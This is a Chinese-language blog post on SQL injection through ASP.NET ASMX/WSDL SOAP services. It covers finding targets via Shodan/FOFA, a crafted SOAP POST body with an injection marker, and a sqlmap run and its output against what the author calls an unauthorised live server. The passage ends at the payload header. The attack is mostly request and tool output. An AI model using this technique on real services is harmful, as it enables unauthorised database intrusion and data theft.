由于一些机缘巧合,发现了一些SQL注入的新姿势,记录一下;
算是SQL注入的一种,叫wsdl注入,刚开始遇到比较新鲜,遂记录之。文笔不佳,包括注入理解都较为浅薄,各位大佬、师傅们见笑。
记录就是一个简单的练手记录,感觉非常有意思;
目标确定
在shodan、fofa上搜asmx
,找到疑似存在wsdl注入的站(未授权),大概的是这样的:http://vuln_ip:8081/WebService1.asmx?WSDL
,一般我们可以通过手工的方式去尝试注入,这样的站访问进去后是类似xml的文件,里面是各种与服务器交互的参数,比如登录页面的username、passwd参数,开发者们都已经配置好这些参数;
如下,这是一个参数对应的xml标签:
<s:element name="HelloWorldResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="HelloWorldResult" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
sqlmap一把梭
wsdl注入
我们手工的方式是构造一个SOAP对应的参数的post包发给asmx网页。post包如下:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:HelloWorldResult>
<urn:ins>1*</urn:ins>
</urn:HelloWorldResult>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
大致的一个构造思路就是这样的,然后观察服务器数据库的报错情况,我们可以直接把数据post包拿过来跑:
root@#:/home/tool/sqlmap-data/wsdl-inject# sqlmap -r net-test1.txt --batch
___
__H__
___ ___[.]_____ ___ ___ {
1.2.4#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end
user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program
[*] starting at 11:03:20
[11:03:54] [INFO] testing Microsoft SQL Server
[11:03:54] [INFO] confirming Microsoft SQL Server
[11:04:24] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[11:04:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:04:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 19 times
[11:04:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/underattack-host'
[*] shutting down at 11:04:24
注入payload单独发出来,如下:
---
Parameter: SOAP #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based